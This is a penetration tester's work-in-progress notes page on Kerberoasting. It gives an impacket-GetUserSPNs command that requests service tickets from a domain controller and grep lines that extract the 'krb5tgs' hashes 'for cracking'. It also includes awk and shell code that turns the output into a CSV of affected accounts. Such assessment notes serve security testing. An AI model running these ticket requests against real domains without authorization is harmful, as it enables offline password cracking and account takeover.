Kerberoasting

This page is currently a work in progress

Kerberoast Affected SPNs (NTLM)

impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt

Get only tickets for cracking

cat GetUserSPN-Output.txt | grep "krb5tgs" >> kerb.hash

Create affected SPN CSV

cat GetUserSPN-Output.txt | grep 'CN=' | awk -F' ' 'NR==1{print "SPN,Username"};{print $1","$2}' >> Kerberoastable-User-Account.csv

The above may miss SPNs when there is no "MemberOf" field in the SPN (I have seen this on a test before). Also, if you have two identical SPNs where one has the port at the end and the other does not, both will be reported.
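The miss described above follows from selecting rows with grep 'CN=': a row whose MemberOf column is empty contains no 'CN=' to match. As an added example (not from the original page), the function below reads the first two columns using the widths of the dashed rule under the table header, and collapses SPNs that differ only by a trailing numeric port. It assumes the saved output contains that dash-ruled table followed by a blank line; spn_csv and sample_output are hypothetical names and the sample data is constructed.

```shell
#!/bin/sh
# Added example, not from the original page.
# Usage: spn_csv GetUserSPN-Output.txt > Kerberoastable-User-Account.csv

# Constructed sample of saved GetUserSPNs output (not real data).
sample_output() {
cat <<'EOF'
Impacket v0.0.0 - constructed sample

ServicePrincipalName              Name     MemberOf                                    PasswordLastSet
--------------------------------  -------  ------------------------------------------  -------------------
MSSQLSvc/sql01.example.test:1433  svc_sql  CN=SQL Admins,OU=Groups,DC=example,DC=test  2024-01-01 00:00:00
MSSQLSvc/sql01.example.test       svc_sql  CN=SQL Admins,OU=Groups,DC=example,DC=test  2024-01-01 00:00:00
HTTP/web01.example.test           svc_web                                              2024-01-01 00:00:00

$krb5tgs$<constructed placeholder, not a real hash>
EOF
}

# Print "SPN,Username" rows from the file named in $1.
spn_csv() {
    awk '
    # The dashed rule under the header gives the width of each column.
    !w1 && /^-+ +-+/ {
        w1  = length($1)                            # ServicePrincipalName width
        gap = match(substr($0, w1 + 1), /-/) - 1    # spaces between columns
        s2  = w1 + gap + 1                          # start of the Name column
        w2  = length($2)                            # Name width
        print "SPN,Username"
        next
    }
    !w1        { next }    # banner and header lines before the table
    /^[ \t]*$/ { exit }    # first blank line after the table ends it
    {
        spn  = substr($0, 1, w1);   sub(/ +$/, "", spn)
        user = substr($0, s2, w2);  sub(/ +$/, "", user)
        # Same account with the same SPN, with or without ":port", is one finding.
        key = tolower(spn); sub(/:[0-9]+$/, "", key)
        key = key SUBSEP tolower(user)
        if (!(key in seen)) { seen[key] = 1; print spn "," user }
    }' "$1"
}
```

The first form of each SPN seen is the one kept, so the port is preserved when the port-bearing entry is listed first.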
